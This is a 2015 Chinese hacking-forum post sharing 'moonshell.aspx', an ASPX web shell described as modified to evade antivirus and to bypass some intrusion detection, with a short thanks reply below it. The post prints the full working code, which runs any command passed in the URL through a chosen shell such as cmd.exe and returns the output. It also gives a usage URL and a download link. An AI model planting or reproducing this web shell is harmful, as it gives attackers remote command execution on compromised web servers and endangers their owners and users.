搜索
查看: 945|回复: 2

发个免杀修改的aspx提权马moonshell.aspx

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-6-4 20:50:15 | 显示全部楼层 |阅读模式
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Web.UI"%>
  11. <%@ import Namespace="System.Runtime.InteropServices"%>
  12. <%@ import Namespace="System.DirectoryServices"%>
  13. <%@ import Namespace="System.ServiceProcess"%>
  14. <%@ import Namespace="System.Text.RegularExpressions"%>
  15. <%@ Import Namespace="System.Threading"%>
  16. <%@ Import Namespace="System.Data.sqlClient"%>
  17. <%@ import Namespace="Microsoft.VisualBasic"%>
  18. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  21. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  22. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  23. <script runat="server">
  24. protected void Page_load(object sender,EventArgs e)
  25. {
  26.   string ok = Request.QueryString["sb"];
  27.   string shell= Request.QueryString["shell"];
  28.   //www.moonsec.com moon
  29.   Response.Write(shell + ok );
  30.   Response.Write("<pre>");
  31.   Response.Write(GetCmd(ok,shell));
  32.   Response.Write("</pre>");
  33. }

  34. private string GetCmd(string cmd,string shell)
  35. {
  36.   string ok = string.Empty;
  37.    Process p = new Process();
  38.             p.StartInfo.FileName = shell;
  39.             p.StartInfo.UseShellExecute = false;
  40.             p.StartInfo.RedirectStandardInput = true;
  41.             p.StartInfo.RedirectStandardOutput = true;
  42.             p.StartInfo.RedirectStandardError = true;
  43.             p.StartInfo.CreateNoWindow = true;
  44.             string strOutput = null;
  45.             try
  46.             {
  47.                 p.Start();
  48.                 p.StandardInput.WriteLine(cmd);
  49.                                 Response.Write(cmd);
  50.                 p.StandardInput.WriteLine("exit");
  51.                 ok = p.StandardOutput.ReadToEnd();
  52.                 p.WaitForExit();
  53.                 p.Close();
  54.              }
  55.             catch (Exception ex)
  56.              {
  57.                           Response.Write("<pre>");
  58.                           Response.Write(ex);
  59.                           Response.Write("/<pre>");
  60.                  }
  61.   return ok;
  62. }
  63. </script>
  64. </head>
  65. <body>
  66. </body>
  67. </html>
复制代码
能绕过一些查询ids的。并且有调试信息输出,方便我们查看原因。
用法
http://192.168.1.108/moonshell.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig
图:

下载地址

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了

1

主题

21

帖子

51

积分

我是新手

Rank: 1

积分
51
发表于 2016-10-19 18:48:15 | 显示全部楼层
谢谢了,我正需要
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表